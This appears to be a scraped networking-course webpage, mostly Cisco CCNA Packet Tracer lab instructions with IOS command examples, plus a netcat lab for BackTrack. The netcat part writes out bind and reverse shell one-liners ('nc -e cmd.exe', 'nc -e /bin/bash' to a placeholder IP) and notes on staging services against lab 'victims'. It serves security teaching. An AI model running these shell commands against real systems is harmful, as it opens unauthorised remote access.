{loadposition adposition4}

{loadposition adposition5}Lab Overview - Routing and Switching Essentials Practice Final

I designed this Packet Tracer 6 lab activity as a final review for the CCNA2: Routing and Switching Essentials. This lab covers many of the skill and knowledge areas necessary for the Cisco Academy CCNA5.0, Routing and Switching Essentials Final, Hands-on Lab Final and Packet Tracer Final. This Packet Tracer activity also includes IPv6  configurations that are covered in the new curriculum. You will need Packet Tracer 6.0.1 to open the activity file. The activity tracks your overall progress and provides feedback on correctly executed tasks. Here is a list of the knowledge and skill areas that it covers:

• IPv4 addressing and IPv6 addressing,
• VLANs, Trunks and InterVLAN routing,
• OSPFv2 and OSPFv3 for IPv6
• DHCPv4 as well as SLAAC and Stateless DHCPv6
• NAT for IPv4,
• ACLs and IPv6 ACLs,

The scoring is based on the total number of items correctly configured. Remember that when entering configurations the system is case sensitive. When you are finished, you should be able to communicate across the network. In this PT activity access to the CLI tab has not been disabled. Have fun!

Download

CCNA2_RoutingNSwitching-practice-final.zip

Note: You will need Packet Tracer version 6.0.1 to open this activity

Lab Answers

Visit this site again soon for the upcoming video tutorials where I walk through this lab!

{loadposition adposition8} 

Switch & VLAN Packet Tracer Challenge Overview

A Packet Tracer graded activity. It covers basic Cisco CCNA switch configurations, VLANs, native VLAN, trunk ports, port-security, and setting up secure remote administration with SSH. Great practice for the the Cisco CCNA!

Download

The Packet Tracer file is created with Packet Tracer 5.3.3. The Packet Tracer Activity file will track your progress and give you a completion percentage and point total. You can download it here: BasicConfig-VLAN-Trunk-PortSec-SSH-challenge.zip

{loadposition adposition4}

{loadposition adposition5}Activity Instructions

Configure the Network according to the Topology Diagram and Labels.
When you are finished, the PCs on the Student VLAN should be able to ping each other and so should the PCs on the Faculty VLAN. The Admin PC should be able to SSH into S1 and S2 from the command prompt (Eg. PC>ssh -l admin 192.168.99.2)

PCs
1. IP address (see topology),
2. subnet mask (see topology),
3. default gateway address (first usable address in network)

Cisco 2960 Switches: S1 & S2
1. name: S1, S2
2. enable password, md5 encrypted: class
3. domain name: danscourses.com
4. message of the day banner: Unauthorized access is prohibited!
5. console password: cisco
6. vty 0 15 password: cisco
7. Security RSA Key size: 1024
8. SSH version 2
9. vty: ssh only
10. VLAN 10: student
11. VLAN 20: faculty
12. VLAN 99: Mgt
13. Interface VLAN 99: S1-IP address 192.168.99.2, S2-IP address 192.168.99.3
14. Native VLAN 99
15. fa0/1 Trunk
16. fa0/2-0/13 access VLAN 10
17. fa0/14-0/24 access VLAN 20
18. Gi1/1 access VLAN 99
19. Encrypt all passwords
20. Save running-config to startup-config

Cisco 2960 Switch: S1 Only
1. Gi1/1 Switchport Port-Security, sticky, maximum 1 mac address, violation shutdown

{loadposition adposition9}

{loadposition adposition5}The Format of an IPv4 Address

An IPv4 address can be written in two ways:

   dotted decimal notation - 192.168.1.1
   32-bit binary notation - 11000000.10101000.00000001.00000001

The address has 4 octets separated by periods and counted from let to right. There are three types of IPv4 addresses: a network address, a host address, and a broadcast address. In other words you could say a computer is on the 192.168.10.0 /24 network (network address), and is using a host address of 192.168.10.1. The address 192.168.10.1 represents the ip address in dotted decimal notation. That same address in binary notation is 11000000.10101000.00001010.00000001. The 1(00000001) is in the 4th octet.

Converting Binary to Decimal and Vice Versa

Network Portion and the Host Portion of an IP Address and Subnet Mask

{loadposition adposition6}The network portion and the host portion of an ip address is defined its subnet mask. This process is easy if the subnet mask is classful meaning either:

Class C  -  255.255.255.0  or /24,
Class B  -  255.255.0.0  or /16,
Class A  -  255.0.0.0  or /8

So if the ip address is 192.168.1.100 and the subnet mask is classful meaning 255.255.255.0 then the 255s in the subnet mask tell you the network portion and the 0s tell you the host portion. For example, below the network portion is in red and the host portion is in black:

192.168.1.100
255.255.255.0
(So the network is 192.168.1.0, and the host is number 100)

Using the example above the first address in the network is the network address (192.168.1.0). The last address in the network is the broadcast address (192.168.1.255), and the host addresses in the network are the addresses between the network and the broadcast  (192.168.1.1 - 192.168.1.254).

The process is a little more difficult when a non-classful subnet mask is used. In this scenario binary conversion must be used to delineate the network and host portions of an address. Consider the following example:

192.168.1.100 /27 or

192.168.1.100
255.255.255.224
Where are the network and host portions now?

To easily solve the question convert to binary:
11000000.10101000.00000001.01100100  = 192.168.1.100
11111111.11111111.11111111.11100000 = 255.255.255.224
(The 1s in the subnet mask identify the network portion, the 0s the host portion)

The network and host portions are still defined by the subnet mask, just more accurately by seeing the address and mask in binary and identifying the 1s and 0s. The question that you now have to ask yourself is, what is the networkaddress, broadcast address and host addresses if the subnet mask is 255.255.255.224? To answer this question you need to, in binary, logically AND the ip address and subnet mask and you will get the network address. To understand this process and more see my video series on subnetting, ANDing and the Magic Number below.

Note: you have to have all subnet mask fields filled in.

{loadposition adposition8}

Overview

This is a beginning Packet Tracer 6.1 activity designed to get you familiar with working with Packet Tracer. Your goal in this Packet Tracer activity is to configure the following:

 1.  Both PCs with IP addresses, subnet masks, and default gateways.
 2.  Configure each switch with: a hostname, an IP address and subnet mask on the VLAN 1 interface, and bring up the VLAN 1 interface.
 3.  Configure the router with: a hostname, and IP address and subnet mask on each gigabit ethernet interface, and bring up the interfaces.  

Download

{loadposition adposition4}

CCNA1-exercise1-activity.zip

{loadposition adposition6}

Command Examples

switch> enable
switch# configure terminal
switch(config)# hostname S1
S1(config)# interface vlan 1
S1(config-if)# ip address 192.168.1.2 255.255.255.0
S1(config-if)# no shutdown

router> enable
router# configure terminal
router(config)# hostname R1
R1(config)# interface g0/1
R1(config-if)# ip address 192.168.1.1 255.255.255.0
R1(config-if)# no shutdown

{loadposition adposition9}

Overview

This is a beginning network configuration activity in Packet Tracer 6.1. This activity is designed to challenge you with some basic Cisco IOS configurations using a Cisco 1941 router, two Cisco Catalyst 2960 switches, a TFTP server and two PCs. In this Packet Tracer activity you are asked to configure the following items:

{loadposition adposition5}Step 1. Assign IPv4 addresses, subnet masks and default gateways to PC-A, PC-B, and Server1

Step 2. Configure the router with the following settings:
- hostname: R1
- console password: cisco
- vty 0-to-4 password: cisco
- enable secret: class
- banner message of the day: Unauthorized access is not allowed!
- encrypt all passwords
- configure Gigabit Ethernet interfaces with:
--- IPv4 addresses,
--- subnet masks,
--- descriptions (LAN-Management, LAN-Student)
--- bring-up the interfaces           
- save the running configuration

Step 3. Configure each switch with the following settings:
- hostname: S1, S2
- console password: cisco
- vty 0-to-15 password: cisco
- enable secret: class
- banner message of the day: Unauthorized access is not allowed!
- encrypt all passwords
- configure interface VLAN 1 with:
--- IPv4 address,
--- subnet mask,
--- bring-up the interface
- default gateway IPv4 address            
- save running configuration

Step 4. Copy the IOS and startup-config file on R1, to the Server1 TFTP server.

Download the Activity

{loadposition adposition4}

BasicNetworkConfiguration-Activity2.zip

{loadposition adposition9}

Overview

It is important to know how to troubleshoot network connectivity issues. How to configure PCs to add them to the network? What tools can you use from the command prompt to test connectivity and check your network address settings? In order to test your skills, I created a Packet Tracer 6.1 activity in which you are the network administrator and you need to troubleshooting the network and answer some fundamental questions about the network. I have included the Packet Tracer activity file for you to download as well as the instructions below.

{loadposition adposition5}Instructions - Troubleshooting Activity

Troubleshooting Tasks
1. Fix PC1 and PC2 so they can reach the company website www.initech.com, and remote website www.danscourses.com.
2. Fix Laptop0 so it can associate with Wireless Router0, and connect to the wireless network

Initech Admin
vty password: swingline
enable secret: cubicle

Answer the Following Questions
1. What is the network address of the green network?
2. What is the network address of the orange network?
3. What is the IP address of the Initech webserver?
4. What is the IP address of the Initech Nameserver?
5. What is the IP address of the Initech Mail Server?
Hint: what is the subdomain name of the mail server?
6. What is the IP address of the danscourses.com Webserver?
7. What is the SSID of Wireless Router0?
8. What is the wireless security key?
9. What is the IP address of the WAN interface on the Edge Router?

Download

Click here to download the PT activity:  TroubleshootingActivity1.zip
To open the file you will need Packet Tracer 6.1

{loadposition adposition8}

VLANs Trunks and SVIs - Activity Overview

In this graded Packet Tracer 6.1 activity you will need to configure two Catalyst 2960 switches with named VLANs. A trunk between the two switches, and a management IP address on each switch using switched virtual interfaces (SVIs). You will also need to configure hostnames on the switches and each PC with an IP address and subnet mask. 

Instructions

{loadposition adposition6}
1. Configure the PCs IP address based on their host address label and the VLAN color code
2. Configure switch hostnames based on their labels
3. Configure the switch VLAN numbers and VLAN names according to the diagram
4. Configure Interface VLAN88 (SVI) addresses on both switches (see diagram)
5. Configure the switchports as access ports in VLANs according to the diagram
6. Configure G0/1 as a Trunk. Allow the listed VLANs only across the trunk and configure the Native VLAN as shown
7. Shutdown G0/2

Download

For this graded activity you will need Packet Tracer version 6.1 or higher.

VLANS-Switchports-Trunks-SVIs.zip

IOS CLI Commands for Switch S1

Switch> enable
Switch# configure terminal
Switch(config)# hostname S1
S1(config)# vlan 10
S1(config-vlan)# name students
S1(config-vlan)# vlan 20
S1(config-vlan)# name faculty
S1(config-vlan)# vlan 30
S1(config-vlan)# name administration
S1(config-vlan)# vlan 88
S1(config-vlan)# name management
S1(config-vlan)# vlan 99
S1(config-vlan)# name native
S1(config-vlan)# exit
S1(config)# int range f0/1 - 8
S1(config-if)# switchport mode access
S1(config-if)# switchport access vlan 10
S1(config-if)# int range f0/9 - 16
S1(config-if)# switchport mode access
S1(config-if)# switchport access vlan 20
S1(config-if)# int range f0/17 - 23
S1(config-if)# switchport mode access
S1(config-if)# switchport access vlan 30
S1(config-if)# int f0/24
S1(config-if)# switchport mode access
S1(config-if)# switchport access vlan 88
S1(config-if)# int vlan 88
S1(config-if)# ip address 192.168.88.254 255.255.255.0
S1(config-if)# int g0/1
S1(config-if)# switchport mode trunk
S1(config-if)# switchport trunk allowed vlan 10,20,30,88,99
S1(config-if)# switchport trunk native vlan 99
S1(config-if)# int g0/2
S1(config-if)# shut

 {loadposition adposition8}

HSRP Overview

If your gateway goes down it is a good idea to have a backup that takes over immediately. Using Cisco's Hot Standby Routing Protocol (HSRP) you can configure a router to be an automatic backup gateway without having to change all of your network client's default gateways, by reconfiguring your DHCP server, and releasing all of the gateway addresses on your network. {loadposition adposition5}In this graded Packet Tracer activity you configure HSRP to create active and standby router gateways.

In the activity, R1 is the current gateway router at 192.168.1.2. Your task is to configure a virtual IP address on both router R1 and R2 G0/0 interfaces. You will configure R1 as the active router and R2 as the standby. Once that is done you will change the default gateway address on PC-A to the new virtual IP address and test. Download the Packet Tracer file and following along with my video tutorial.

Instructions

Download

{loadposition adposition4}
HSRP_activity.zip

Note: You will need to have Packet Tracer version 6.1 installed on your computer in order to open the file.

Video Tutorial

{loadposition adposition10}

EtherChannel Overview

EtherChannel is a Cisco technology that enables the aggregation or bundling of switchports into one logical link. Bundling multiple switchport ethernet links into one logical channel increases bandwidth as well creating redundancy and fault tolerance. For example, a bundle of four switchports into one EtherChannel would provide four times the bandwidth coming to and from the switch. EtherChannel bundles or port groups can be run from switch-to-switch or switch-to-server if the server's network interfaces cards (NICs) support EtherChannel. You can bundle up to eight switchports in one Etherchannel port group with no more than six EtherChannel port groups per switch.

{loadposition adposition5}Instructions

In this Packet Tracer 6.2 activity you configure different forms of EtherChannel on switches S1, S2 and S3. The PCs have already been configured with IP addresses, subnet masks and default gateways.

1. Create VLANs 10 and 20 on all three switches
2. On both S1 and S2 configure switchport 0/1 as an access port and add it to VLAN10. Configure switchport 0/10 as an access port and add it to VLAN20.
3. Configure the open standard for EtherChannel, Link Aggregation Control Protocol (LACP 802.3ad) as channel-group 1 on both S1 and S2 Gigabit Ethernet switchports 0/1 and 0/2.
4. Configure Cisco's Port Aggregation Protocol (PAgP) for EtherChannel as channel-group 2 between S2 and S3 Fast Ethernet switchports 0/21-24.
5. Configure Cisco's EtherChannel manually with no PAgP as channel-group 3 between S3 and S1 Fast Ethernet switchports 0/17-20.
6. Configure all three resulting virtual or logical interfaces (port-channel interfaces) as trunks and allowing only VLANs 10 and 20.
7. Verify the EtherChannels with show etherchannel commands and by pinging from PC0 to PC2 and PC1 to PC3.

Download

{loadposition adposition4}
etherchannel-begin.zip

Note: This Packet Tracer activity requires Packet Tracer version 6.2 minimum.

Video Walkthrough Tutorial

CLI Command Examples

S1(config)# vlan 10
S1(config-vlan)# vlan 20
S1(config-vlan)# exit
S1(config)# int f0/1
S1(config-if)# switchport mode access
S1(config-if)# switchport access vlan 10
S1(config-if)# int f0/10
S1(config-if)# switchport mode access
S1(config-if)# switchport access vlan 20
<repeat commands above on S2>

S1(config)# int range g0/1-2
S1(config-if)# channel-group 1 mode active
S1(config-if)# exit
S1(config)# int port-channel 1
S1(config-if)# switchport mode trunk
S1(config-if)# switchport trunk allowed vlan 10,20

S2(config)# int range g0/1-2
S2(config-if)# channel-group 1 mode passive
S2(config-if)# exit
S2(config)# int port-channel 1
S2(config-if)# switchport mode trunk
S2(config-if)# switchport trunk allowed vlan 10,20
 
S3(config)# vlan 10
S3(config-vlan)# vlan 20

S3(config)# int range f0/21-24
S3(config-if)# channel-group 2 mode desirable
S3(config-if)# exit
S3(config)# int port-channel 2
S3(config-if)# switchport mode trunk
S3(config-if)# switchport trunk allowed vlan 10,20

S2(config)# int range f0/21-24
S2(config-if)# channel-group 2 mode auto
S2(config-if)# exit
S2(config)# int port-channel 2
S2(config-if)# switchport mode trunk
S2(config-if)# switchport trunk allowed vlan 10,20

S3(config)# int range f0/17-20
S3(config-if)# channel-group 3 mode on
S3(config-if)# exit
S3(config)# int port-channel 3
S3(config-if)# switchport mode trunk
S3(config-if)# switchport trunk allowed vlan 10,20

S1(config)# int range f0/17-20
S1(config-if)# channel-group 3 mode on
S1(config-if)# exit
S1(config)# int port-channel 3
S1(config-if)# switchport mode trunk
S1(config-if)# switchport trunk allowed vlan 10,20

 
{loadposition adposition9}

Cisco CCNA: Intro to Networking - Starting Sept 29th

Sign up for my Fall Cisco CCNA: Intro to Networking class through Community Learning at Central Oregon Community College. This course is a non-credit course that you can attend in-person or online through streaming video. Enrolling in the course will also enroll you in the COCC Cisco Academy, give you free access to the online textbook, the latest CCNA Routing and Switching: Introduction to Networks curriculum from the Cisco Networking Academy. By enrolling in the course you will also get access to Packet Tracer as well as hands-on access to real networking equipment through the online Netlab. Access to Netlab will last for the duration of the course plus 2 additional weeks. The cost of the class is an excellent value at $499. The first class is September 29th, and will meet twice a week for 10 weeks. For more information go to: http://www.cocc.edu/continuinged/full-class-listing/ and scroll down to the Fall 2015 classes under the heading Computer - Advanced IT. Class spaces are limited so sign up soon!

{loadposition adposition5}

Netcat and Bind Shells Overview

Netcat is a network connection tool that can read and write to TCP and UDP ports. It can do any kind of thing that acts like a server and a client. It could be a web server, a mail server, a chat server, or any other kind of server. It could be used to transfer files or serve any process even a command shell. "It is all things to all people for all reasons" - Steve B.  

{loadposition adposition5}Netcat is installed by default in BackTrack. The Linux binary is located in the /bin/nc and the Windows binary is in /pentest/windows-binaries/tools/nc.exe

Netcat was created in 1996 and is to this day still considered a great network debugging and testing tool. In 2005 the makers of Nmap created an updated version of Netcat called Ncat that offers additional features like SSL support. Ncat is installed with Nmap for Windows. You can download an updated version of Ncat for Windows at this website: http://nmap.org/ncat/. Scroll to the bottom and look for the Windows binary.

sbd is a netcat clone that offers encryption and runs on Windows or Linux. You can find it and many other netcat related tools here: http://packetstormsecurity.org/UNIX/netcat/ 

A good overview about netcat: http://en.wikipedia.org/wiki/Netcat

{loadposition adposition6} Lab 1 - Setup a netcat connection between two hosts (send text)

1. Connect to your XPclient (or any network host) and run netcat. The class XPclients have nc.exe in the extras folder.
2. Copy and paste nc.exe in your c:\\WINDOWS\ directory so that you will have it available in your command PATH
3. Open a command prompt and type:
           >nc -lvp 4444   //sets netcat to listen verbosely on port 4444
4. Check with Netstat
           >netstat -an | FIND "4444"   //netcat is listening on tcp port 4444
5. Go to your BackTrack client and open a terminal and type:
           #nc <ip address you are connecting to>  4444   //connect with netcat on port 4444
6. You should eventually see an open connection, try type "hello" back and forth between clients.
   

Lab 2 - Transfer files using netcat (pipe to a file)

1. In BackTrack use your favorite text editor and type a sentence of text. Save the file as fileshare.txt
2. In your XPclient type this into the command prompt:
           >nc -lvp 2233 > fileshare.txt
3. From a BackTrack terminal type in the following commands:
           #nc <the IP address> 2233 < fileshare.txt 
4. Check your XPclient to see if you received the file. 
5. How would you make the listener (the server) send the file instead of receiving it?

{loadposition adposition7}Lab 3 - Bind a command prompt to a port creating a Bind Shell (the server has a shell listen )

1. In your XPclient open a command prompt and type this:
           >nc -lvp 7777 -e cmd.exe    //this sets cmd.exe to execute on port 7777 when a connection is established
2. In your BackTrack client open a terminal window and type this:
           #nc <the ip address to connect to> 7777   //connect with netcat on port 7777
3. If you are successful you will eventually see a windows command shell in your BackTrack terminal. You bound a shell (cmd.exe) to a port and served it.

Lab 4 - Create a reverse Bind Shell (the client sends the shell)

1. In your XPclient open a command prompt and type this:
           >nc -lvp 7777    //this sets netcat to listen on port 7777(server)
2. In the BackTrack client in a terminal windows type the following:
           #nc -nv <the ip address> 7777 -e /bin/bash   //executes a bash shell on port 7777 to the listening nc server on the windows client
3. If you are successful you will receive a shell on the XPclient that you can type bash commands. Try running an ls command. You will not see a # prompt.

{loadposition adposition8} 

Lab 5 - World's simplest web server (pipe a html file to a port)

1. Create or download a simple webpage save it to the current directory and then put this command in a terminal
           #cat index.html | nc -vl 80
2. Now on another computer on your network connect to that IP address and view the webpage
   

{loadposition adposition4} 

{loadposition adposition8} 

Overview

Now we need to get full installations of Joomla and WordPress, which you can download from their websites. If you are running Windows you will want to download the zipped versions of Joomla and WordPress. {loadposition adposition5}Once you have download the zipped packages, you will need to extract or unzip them by RIGHT+Clicking on them and selecting 'Extract all'. Once extracted, you will see that the both the Joomla and WordPress frameworks consist of files and folders within once central folder. The files types consist of php, css, html, javascript, xml, jpg, and png files, etc.. A Joomla and WordPress website starts with that central 'folder' and all of the folders and files contained therein.

A Joomla and WordPress website is essentially a folder with all of the Joomla or WordPress files and folders located inside, connect it to a MySQL database and you have a Joomla or WordPress website. When you download Joomla or WordPress, you are downloading the whole thing (minus the database) in one compressed folder, which you then have to decompress (unzip). Once the folder is unzipped, you can rename the folder to anything you like to differentiate it from other sites (folders) on your webserver. Each 'website' is another instance of this complete folder or directory. In computer lingo, the word "directory" is often substituted or preferred over the word folder. Repeating this concept, if you decided to host multiple Joomla and WordPress websites on your server, each website will need its own uniquely named directory containing all of the files and directories within, as well as a MySQL database to go with it. 

Materials

You will need to go to the Joomla website and download two version of Joomla. I recommend downloading the zip versions of Joomla 1.5.x, a classic older version, and Joomla 2.5.x (the x signifies the latest sub version.

You will also need to go to visit WordPress website and download the latest zip version of WordPress currently it is WordPress 3.4.2.

{loadposition adposition9}

Video Tutorials

This series of video tutorials will walk you through installing Joomla 1.5, Joomla 2.5, and WordPress 3.4.2. The goal is to set up three development websites on your local computer in order to begin learning how to use Joomla and WordPress.

 

Preparing to install three websites in WAMPserver

{loadposition adposition4}

Creating the databases 

Install Joomla 1.5.x

Install Joomla 2.5.x

Install WordPress 3.4.2 

{loadposition adposition8}

{loadposition adposition4}

{loadposition adposition9}

Overview

In the tutorials below, I configure DHCP and NAT and demonstrate its function using Packet Tracer.

Video Tutorials

Configure the Cisco router to function as a DHCP server

{loadposition adposition8}

Configure the router as a DHCP relay agent - Take 2

Network Address Translation (NAT) - Part 1

{loadposition adposition8}

Network Address Translation (NAT) - Part2

Network Address Translation (NAT) - Part3

{loadposition adposition4}

Network Address Translation (NAT) - Part4

{loadposition adposition9} 

Overview

Open Shortest Path First (OSPF) is a link-state routing protocol that is designed to work with large, more complex networks. OSPF is a classless routing protocol that supports VLSM and CIDR, and uses the Shortest Path First (SPF) algorithm to calculate the best path to a network. {loadposition adposition5}OSPF uses a routing metric of "cost" that in Cisco's implementation is based mainly on the bandwidth of a link. OSPF is able to support hierarchical and scalable network designs through its ability to handle multiple OSPF routing areas.

The Cisco CCNA curriculum requires students to know how to implement and configure only a single-area OSPF network.

OSPF has some similarities to EIGRP, especially in regards to configuration, like requiring a process-id number, using wildcard bits for the subnet mask, hello packets, neighbor relationships or adjacencies, triggered updates, and the use of multiple tables like the neighbor and topology tables.

Characteristics

• Algorithm - Dijsktra's SPF algorithm
• Metric - Cost, which is based on the bandwidth of a link 
• Administrative Distance - 110
• Process-ID number - the process-id number is declared when OSPF is started/configured and is a number from 1 to 65535. The process id number does NOT need to match other OSPF routers in the area in order to create adjacencies (see commands below).
• Wildcard bits/mask - The wildcard mask is the inverse of a network subnet mask (e.g. 255.255.255.0 is 0.0.0.255). It is declared after the network number in the network command (see commands below)
• Area number - The area number is a number from 0-255, declared at the end of the network command after the wildcard bits. Routers in the same area will exchange routing information or Link State Updates or LSUs (see commands below)
• Hello Interval - Hello packets are sent every 10 seconds by default. In order for OSPF routers to establish neighbor adjacencies and exchange routing information successfully, the hello interval needs to match all OSPF routers in the OSPF area. 
• Dead Interval - The dead interval is 40 seconds by default. The dead interval should be 4 times the hello interval, and needs to match all OSPF routers in the area
• Multiple Tables - Routing Table, Topology Table, and Neighbor Adjacency Table
• DR and BDR Elections - In broadcast multi-access networks (Ethernet), routers in the OSPF area will elect a Designated Router (DR) and a Backup Designated Router (BDR). The DR will be the receiver and distributor of Link-State Packets to other routers in the OSPF area. The BDR will wait, and be ready to take over the duties of the DR in case it fails.

IOS CLI Commands {loadposition adposition6}

The router ospf command starts the OSPF routing process. The process ID number can be a number between 1 and 65535:

 router(config)# router ospf <process-id>

  EXAMPLE: router(config)# router ospf 1

The network command will add a connected network to the routing process. In addition to the network IP address you need to provide the wildcard mask, which is the inverse of the subnet mask and the area parameter and number. Typically in single area OSPF the area is often set to area 0.

 router(config-router)# network <network-number> <wildcard-mask> area <area-number>

  EXAMPLE: router(config-router)# network 192.168.1.0 0.0.0.255 area 0
  EXAMPLE: router(config-router)# network 172.16.0.0 0.0.255.255 area 0
  EXAMPLE: router(config-router)# network 201.132.33.4 0.0.0.3 area 0 //for a /30 subnet mask

In OSPF, the router-id command will manually set the router's router-id. In broadcast multi-access networks the router with the highest router-ID will become the designated router (DR) and the router with the second highest router-ID will become the backup designated router (BDR).

 router(config-router)# router-id <ip-address>

  EXAMPLE: router(config-router)# router-id 192.168.100.254

The passive-interface command can be used to stop OSPF packets from being sent out of a network interface where there are no other OSPF routers present.

 router(config-router)# passive-interface <interface-number>

  EXAMPLE: router(config-router)# passive-interface fastEthernet 0/0

Cisco's OSPF cost metrics do not account for links faster than 100 Mbps. For example, a 100 Mbps Ethernet interface will calculate to an OSPF cost of 1, but what if you have a 1000 or 10000 Mbps Ethernet interface? The auto-cost reference-bandwidth can adjust the cost metrics to account for links fast than 100 Mbps.

 router(config-router)# auto-cost reference-bandwidth <megabits-per-second>

  EXAMPLE: router(config-router)# auto-cost reference-bandwidth 10000

The default-information originate command will distribute a default route to other OSPF area routers.

 router(config-router)# default-information originate 

You can use either of the following commands to exit out of router configuration mode.

 router(config-router)# end
 router(config-router)# exit

Since OSPF relies on bandwidth for the metric, it is a good idea to set the specific bandwidth of the serial interface, otherwise the Cisco serial interfaces will default to a speed of 1544 Kbps, which may lead to an inaccurate measurement of the cost of the link. It is important to remember that this command is applied to the network interface in interface configuration mode.

 router(config)# interface serial <interface-number>
 router(config-if)# bandwidth <speed-in-kbps>

  EXAMPLE: router(config)# interface serial 0/0/0
           router(config-if)# bandwidth 384

Another command that is applied to a network interface is the ip ospf priority command. This command can be used to manipulate the DR/BDR election process. By default, the Cisco router's interfaces are all given an OSPF priority of 1, by changing this value to a higher number you can effect the DR/BDR elections. An OSPF priority of 0 will insure the router is never the DR, but an OSPF priority number of 255 will insure that the router will be elected as the designated router or DR.

 router(config-if)# ip ospf priority <0-255>

  EXAMPLE: router(config-if)# ip ospf priority 255

The following commands are all applied to a network interface, but they all effect the OSPF routing protocol operation. Instead of configuring the bandwidth of the link, which will subsequently effect the calculation of the cost metric, you can configure the cost value directly. To do this you need to know how to manually calculate the cost metric. The cost metric of a network link is calculated by the following method: cost equals 10^8 power divided by the network interface speed in bits per second, e.g. the cost for Fast Ethernet is 10^8/100,000,000 = 1..

 router(config-if)# ip ospf cost <cost-value>

  EXAMPLE: router(config-if)# ip ospf cost 781 //for a 128kbps link

For neighboring OSPF routers to achieve adjacencies the OSPF hello interval and dead interval, on each OSPF router needs to match. In a multi-access, broadcast network the default hello interval is 10 seconds, and the dead interval is set to four times the hello interval, or 40 seconds. You can manipulate these times to, for example: have less hello packets on the network, but if you adjust the hello interval, you also need to adjust the dead interval, and you need to do so, for all OSPF routers in the OSPF area.   

 router(config-if)# ip ospf hello-interval <seconds>
 router(config-if)# ip ospf dead-interval <seconds>

  EXAMPLE: router(config-if)# ip ospf hello-interval 10
           router(config-if)# ip ospf dead-interval 40

The following show commands are useful in verifying and troubleshooting OSPF operation and configuration, as well as identifying the router-ids and the identities of the DR and BDR. 

 router# show ip ospf neighbor
 router# show ip ospf interface
 router# clear ip ospf process
 router# show running-config
 router# show ip protocols
 router# show ip route
 {loadposition adposition6}

Sample command usage:

router(config)#router ospf 1
router(config-router)#network 192.168.0.0 0.0.0.255 area 0
router(config-router)#network 192.168.50.0 0.0.0.255 area 0
router(config-router)#passive-interface fa0/1
router(config-router)#default-information originate
router(config-router)#end
router#show ip ospf neighbor
router# show ip ospf interface
router# clear ip ospf process

Analyzing Show Commands

Example OSPF Network

     router#show ip ospf neighbor

In the "show ip ospf neighbor" command above you can see that the router R0 has established three neighbor relationships or adjacencies with the other routers. The "Neighbor ID" above is the neighbor router's Router ID#. The Router ID# can be different than the neighbor router's IP address on the network. In the example above the first router listed has a Router or Neighbor ID of 200.10.10.253 but its IP address on the network is 192.168.50.1. You can also see that router at 192.168.50.3 (R3) is the current BDR or Backup Designated router and that the "Pri" or Router Priority Number has been changed from the default number of 1 to 50. The "State" shows that all three routers have current "FULL" adjacency or neighbor relationships. DROTHER routers will only form FULL adjacencies with DR and BDR routers and 2WAY adjacencies with each other. You can see this in the image of R1's "show ip ospf neighbor" output above. Even if we only look at the output of R0's show command above (top router output image) we can infer that the Designated Router or DR must be the router that issued the command (R0), because of the fact that there is no neighbor listed as a DR, only a BDR and two DROTHERs.  

     router#show ip route

In the image above, the "show ip route" command has been issued, displaying router R0's routing table. From the routing table we can tell that the R0 router has two connected networks "c 192.168.0.0 on FastEthernet0/1" and "c 192.168.50.0 on FastEthernet0/0" and that it has learned from OSPF about routes to three additional "o" networks: 192.168.1.0, 192.168.3.0, and a "o*E2" 0.0.0.0 candidate default route/gateway of last resort. 

 {loadposition adposition8}

Introduction

If we are going to penetrate victim computers (in the test lab) and establish communication to and from those clients so that we may execute commands and transfer files we will need some network services like SSH and FTP.

{loadposition adposition5}SSH 

SSH or secure shell allows you to open a secure terminal connection to a remote host, or simply to login to a remote computer in order to execute commands. This is done through a client server model where a SSH client connects to a SSH server. This type of connection is typically used to securely exchange encrypted data with a remote host, with the data being commands but can even be files using SFTP and SCP which utilize the SSH protocol. SSH was developed to replace non secure remote connection protocols like rlogin, telnet and rsh. SSH typically runs on port 22. SSH should be installed by default in BackTrack.

Manual pages on SSH and the SSHDaemon
   #man ssh
   #man sshd

Generate the secure keys for the host service
    #sshd-generate
   or
    #ssh-keygen

Start the SSH server using the scripts in the init.d directory
  #/etc/init.d/ssh start

Check to see if SSH is listening on Port 22
   #netstat -antp

Since you are now running an SSH server, you could download PuTTY to your Windows client and SSH into your BackTrack machine. Try this, was it successful? If not, where might the block be? Are you VPN'd? Are there any firewalls on the client or on an intermediary network device?

Stop the SSH server using the scripts in the init.d directory
  #/etc/init.d/ssh stop

If you want instructions on how to install SSHD in Ubuntu go here. 

{loadposition adposition10}

HTTPD (Apache)

Apache webserver is the most widely used webserver on the internet. From a network penetration perspective a webserver could be used an exploitation tool serving up malicious files and scripts that will execute against a victims browser and computer. It could also be used as a way of transferring files to a victim machine once access has already been accomplished. Webservers by their very public nature are great way for a hacker getting information or reconnaissance about a company or target. Apache webserver is usually run on port 80.

Start the Apache2 server using the scripts in the init.d directory
  #/etc/init.d/apache2 start

Verify if Apache is listening on Port 80
   #netstat -antp

Your server's accessible web directory is located in /var/www/ and is where you would put your webpages.

If you want instructions on how to install HTTPD Apache in Ubuntu go here. 

{loadposition adposition9}

FTPD

FTP or file transfer protocol is a protocol that allows you to transfer files to and from a remote machine. BackTrack has pure-FTPd installed by default. FTP operates on port 21 and transfers files on port 20.

The steps to setting up pure-FTPd:

Installation (pure-ftpd is installed by default in BackTrack but in case you are using another Linux distribution)
   #apt-get install pure-ftpd
   #yum install pure-ftpd

Configuration to add a FTP user and setup an FTP directory
   #groupadd ftpgroup
   #useradd -g ftpgroup -d /dev/null -s /etc ftpuser
   #pure-pw useradd <your ftp username> -u ftpuser -d /home/ftp/pub/<your ftp username>
     You will be prompted to input a password twice   
   #pure-pw mkdb   
   #cd /etc/pure-ftpd/auth
   #ln -s ../conf/PureDB 60pdb
   #mkdir /home/ftp
   #mkdir /home/ftp/pub
   #mkdir /home/ftp/pub/<your ftp username>
   #chown -R ftpuser:ftpgroup /home/ftp/pub/<your ftp username>
   #/etc/init.d/pure-ftpd restart

Test you install of Pure-FTPd by FTPing to your loopback ip address
   #ftp 127.0.0.1
   key in your <ftp username>
   key in your <ftp password>

{loadposition adposition4}

{loadposition adposition8}

{loadposition adposition4}

Overview

{loadposition adposition5}Installing Microsoft Exchange Server can be a daunting task. There are some pre-installation decisions and preparations to be made. You will need to check to see if your version of Windows Server 2003 (32bit or 64bit), 2008, or 2008R2 is compatible with the version of Exchange Server (2007 or 2010) that you are planning to install. There are also a lot of options on how you can run your Exchange install, either using the GUI Setup Wizard, a command line install, or a scripted install.

By default Exchange Server 2007 and 2010 are 64 bit. Although you can install 2007 in 32bit for a non-production test environment. Here are my recommendations of what could work for you in the lab or at home:

• • Server 2008 R2 and Exchange Server 2010 (64 bit) - The newest architecture is recommended
• • Server 2008 and Exchange Server2007 (64 bit)
